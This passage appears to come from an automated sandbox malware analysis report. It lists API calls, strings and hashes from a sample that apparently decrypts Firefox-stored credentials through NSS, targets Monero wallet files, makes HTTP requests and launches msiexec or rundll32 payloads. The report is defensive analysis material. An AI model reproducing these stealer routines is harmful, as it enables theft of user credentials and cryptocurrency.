                                    • InitOnceExecuteOnce.KERNEL32(6C6FF80C,6C67F240,?,?), ref: 6C68451A
                                    • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C68455C
                                    • LoadLibraryW.KERNEL32(?), ref: 6C684592
                                    • InitializeCriticalSection.KERNEL32(6C6FF770), ref: 6C6845A2
                                    • moz_xmalloc.MOZGLUE(00000008), ref: 6C6845AA
                                    • moz_xmalloc.MOZGLUE(00000018), ref: 6C6845BB
                                    • InitOnceExecuteOnce.KERNEL32(6C6FF818,6C67F240,?,?), ref: 6C684612
                                    • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C684636
                                    • LoadLibraryW.KERNEL32(user32.dll), ref: 6C684644
                                    • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C68466D
                                    • VerSetConditionMask.NTDLL ref: 6C68469F
                                    • VerSetConditionMask.NTDLL ref: 6C6846AB
                                    • VerSetConditionMask.NTDLL ref: 6C6846B2
                                    • VerSetConditionMask.NTDLL ref: 6C6846B9
                                    • VerSetConditionMask.NTDLL ref: 6C6846C0
                                    • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6846CD
                                    • GetModuleHandleW.KERNEL32(00000000), ref: 6C6846F1
                                    • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C6846FD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                    • String ID: Gol$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                    • API String ID: 1702738223-3475055706
                                    • Opcode ID: 87a75fe72a1f49769b83e2350a181e03bc0eed09d472d293ba32ef3177ad5bab
                                    • Instruction ID: 7c0f11e83dde93449c505f2681fff3361a1cfd80bdca339322d3da4dfa917ae4
                                    • Opcode Fuzzy Hash: 87a75fe72a1f49769b83e2350a181e03bc0eed09d472d293ba32ef3177ad5bab
                                    • Instruction Fuzzy Hash: 5B6149B0605348AFEB108F62EC95BA57BFAEF47348F048458E5248B641D7F18946CF6E
                                    APIs
                                    • NSS_Init.NSS3(00000000), ref: 0018C7E5
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
                                      • Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,013ACC18,00000000,?,001A13F0,00000000,?,?), ref: 0018C8AC
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0018C8C9
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0018C8D5
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0018C8E8
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0018C919
                                    • StrStrA.SHLWAPI(?,013ACC30,001A0B37), ref: 0018C937
                                    • StrStrA.SHLWAPI(00000000,013ACC48), ref: 0018C95E
                                    • StrStrA.SHLWAPI(?,013AD7B8,00000000,?,001A13FC,00000000,?,00000000,00000000,?,013A8A00,00000000,?,001A13F8,00000000,?), ref: 0018CAE2
                                    • StrStrA.SHLWAPI(00000000,013AD758), ref: 0018CAF9
                                      • Part of subcall function 0018C660: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0018C6B1
                                      • Part of subcall function 0018C660: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0018C6BC
                                      • Part of subcall function 0018C660: PK11_GetInternalKeySlot.NSS3 ref: 0018C6CA
                                      • Part of subcall function 0018C660: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0018C6E5
                                      • Part of subcall function 0018C660: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0018C72B
                                      • Part of subcall function 0018C660: PK11_FreeSlot.NSS3(?), ref: 0018C7A1
                                    • StrStrA.SHLWAPI(?,013AD758,00000000,?,001A1400,00000000,?,00000000,013A8A30), ref: 0018CB9A
                                    • StrStrA.SHLWAPI(00000000,013A8960), ref: 0018CBB1
                                      • Part of subcall function 0018C660: lstrcat.KERNEL32(?,001A0B2E), ref: 0018C783
                                      • Part of subcall function 0018C660: lstrcat.KERNEL32(?,001A0B2F), ref: 0018C797
                                      • Part of subcall function 0018C660: lstrcat.KERNEL32(?,001A0B33), ref: 0018C7B8
                                    • lstrlen.KERNEL32(00000000), ref: 0018CC84
                                    • CloseHandle.KERNEL32(00000000), ref: 0018CCDC
                                    • NSS_Shutdown.NSS3 ref: 0018CCEA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeString
                                    • String ID:
                                    • API String ID: 1052888304-3916222277
                                    • Opcode ID: a042dad731a55d09f4ce353610f2c2e3e06f498a8c146cb1670be06853665f2c
                                    • Instruction ID: 79edc4b35387bf7619529cab18068d8b2bb8f77aeb319c8f11eba84219050eae
                                    • Opcode Fuzzy Hash: a042dad731a55d09f4ce353610f2c2e3e06f498a8c146cb1670be06853665f2c
                                    • Instruction Fuzzy Hash: 62E1DB71910108ABCF15EBA4DC96FEEB778BF65300F404169F506661A1EF706A4DCBE2
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 6C6CD4F0
                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6CD4FC
                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6CD52A
                                    • GetCurrentThreadId.KERNEL32 ref: 6C6CD530
                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6CD53F
                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6CD55F
                                    • free.MOZGLUE(00000000), ref: 6C6CD585
                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C6CD5D3
                                    • GetCurrentThreadId.KERNEL32 ref: 6C6CD5F9
                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6CD605
                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6CD652
                                    • GetCurrentThreadId.KERNEL32 ref: 6C6CD658
                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6CD667
                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6CD6A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                    • String ID:
                                    • API String ID: 2206442479-0
                                    • Opcode ID: 6d430b19fc546ac4fda8cc31e970ab139d28205058faafc6532f19712a3e4237
                                    • Instruction ID: ab5e121b7d050da7c858a6d3965035c33af4a6f28329d9b24658b4c924a5e85e
                                    • Opcode Fuzzy Hash: 6d430b19fc546ac4fda8cc31e970ab139d28205058faafc6532f19712a3e4237
                                    • Instruction Fuzzy Hash: 7A518C75604705EFC704DF35C884A9ABBF5FF8A358F00862EE95A87710DB30A845CB9A
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 001912D5
                                    • ExitProcess.KERNEL32 ref: 001912E1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: bc30ec4ca239f59d565a9b611627275fa309c94b7cb368253262143c8aa5cd99
                                    • Instruction ID: 36bf20569c8aec540ba18f5f6ff2c4feef1bd8cece58faea25fad9782372a16b
                                    • Opcode Fuzzy Hash: bc30ec4ca239f59d565a9b611627275fa309c94b7cb368253262143c8aa5cd99
                                    • Instruction Fuzzy Hash: AA517D75A0020AFFCF04DFE0D984AAE77B9BF49704F118058E816A7750D770EA95DB61
                                    APIs
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00192CD5
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00192E6D
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00192FFA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: ExecuteShell$lstrcpy
                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                    • API String ID: 2507796910-3625054190
                                    • Opcode ID: 36a131014ac35b7792bc713dc5d5df827f751ca62af8cb60c663e086c67498b7
                                    • Instruction ID: f1d7318c66ac60364ae5bde02bbcb369a01d0a98d0c25197fcae663fbb705c06
                                    • Opcode Fuzzy Hash: 36a131014ac35b7792bc713dc5d5df827f751ca62af8cb60c663e086c67498b7
                                    • Instruction Fuzzy Hash: 9112CA71810108AACF19FBA0DC92FDEB778AF65300F844169F506661A1EF752B4DDBE2
                                    APIs
                                      • Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C684A68), ref: 6C6B945E
                                      • Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6B9470
                                      • Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6B9482
                                      • Part of subcall function 6C6B9420: __Init_thread_footer.LIBCMT ref: 6C6B949F
                                    • GetCurrentThreadId.KERNEL32 ref: 6C6BEC84
                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6BEC8C
                                      • Part of subcall function 6C6B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6B94EE
                                      • Part of subcall function 6C6B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C6B9508
                                    • GetCurrentThreadId.KERNEL32 ref: 6C6BECA1
                                    • AcquireSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BECAE
                                    • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C6BECC5
                                    • ReleaseSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BED0A
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C6BED19
                                    • CloseHandle.KERNEL32(?), ref: 6C6BED28
                                    • free.MOZGLUE(00000000), ref: 6C6BED2F
                                    • ReleaseSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BED59
                                    Strings
                                    • [I %d/%d] profiler_ensure_started, xrefs: 6C6BEC94
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                    • String ID: [I %d/%d] profiler_ensure_started
                                    • API String ID: 4057186437-125001283
                                    • Opcode ID: ab7415e4a7914e6b213dec57f245486f181706a12ff6cb5641864c1ba795b269
                                    • Instruction ID: 1bdfff479c2b94a31c78ff3949a31b2b577b55a9b81634e7a55976a94e85e2c3
                                    • Opcode Fuzzy Hash: ab7415e4a7914e6b213dec57f245486f181706a12ff6cb5641864c1ba795b269
                                    • Instruction Fuzzy Hash: 0521E7756001049BDB009F25E844A9E77BBFF8636CF104211FD34A7742DB719826CBAE
                                    APIs
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C69C5A3
                                    • WideCharToMultiByte.KERNEL32 ref: 6C69C9EA
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C69C9FB
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C69CA12
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C69CA2E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C69CAA5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWidestrlen$freemalloc
                                    • String ID: (null)$0
                                    • API String ID: 4074790623-38302674
                                    • Opcode ID: b389a3ea5074eb894e0287f30ba3a7621743bc8a20465c018d236236b6b00bd6
                                    • Instruction ID: 434a3e9ab528402c4df252e1732b94a4ced101788b346b2e48b19ab73f01d309
                                    • Opcode Fuzzy Hash: b389a3ea5074eb894e0287f30ba3a7621743bc8a20465c018d236236b6b00bd6
                                    • Instruction Fuzzy Hash: 5DA1AF30609342AFDB00DF28C59475ABBF1BFCA758F04892DE99AD7641D731D809CB9A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: image/jpeg
                                    • API String ID: 0-3785015651
                                    • Opcode ID: 4502801822a3d689874509ae34edb2f6c35c684e43dba6c52a903c3d03d6ff0f
                                    • Instruction ID: 8e0e67d386c253625b1430f38b0605ba8efd6f0fda2e2b0821b297b91573a81c
                                    • Opcode Fuzzy Hash: 4502801822a3d689874509ae34edb2f6c35c684e43dba6c52a903c3d03d6ff0f
                                    • Instruction Fuzzy Hash: F371B9B5A10208ABDB14EFE4DC89FEEB7BDBF49700F108508F516A7294DB74A905CB60
                                    APIs
                                      • Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6
                                      • Part of subcall function 001862D0: InternetOpenA.WININET(001A0DE6,00000001,00000000,00000000,00000000), ref: 00186331
                                      • Part of subcall function 001862D0: StrCmpCA.SHLWAPI(?,013AE450), ref: 00186353
                                      • Part of subcall function 001862D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00186385
                                      • Part of subcall function 001862D0: HttpOpenRequestA.WININET(00000000,GET,?,013ADA48,00000000,00000000,00400100,00000000), ref: 001863D5
                                      • Part of subcall function 001862D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0018640F
                                      • Part of subcall function 001862D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00186421
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00194DF8
                                    • lstrlen.KERNEL32(00000000), ref: 00194E0F
                                      • Part of subcall function 001988D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001988F2
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00194E44
                                    • lstrlen.KERNEL32(00000000), ref: 00194E63
                                    • lstrlen.KERNEL32(00000000), ref: 00194E8E
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
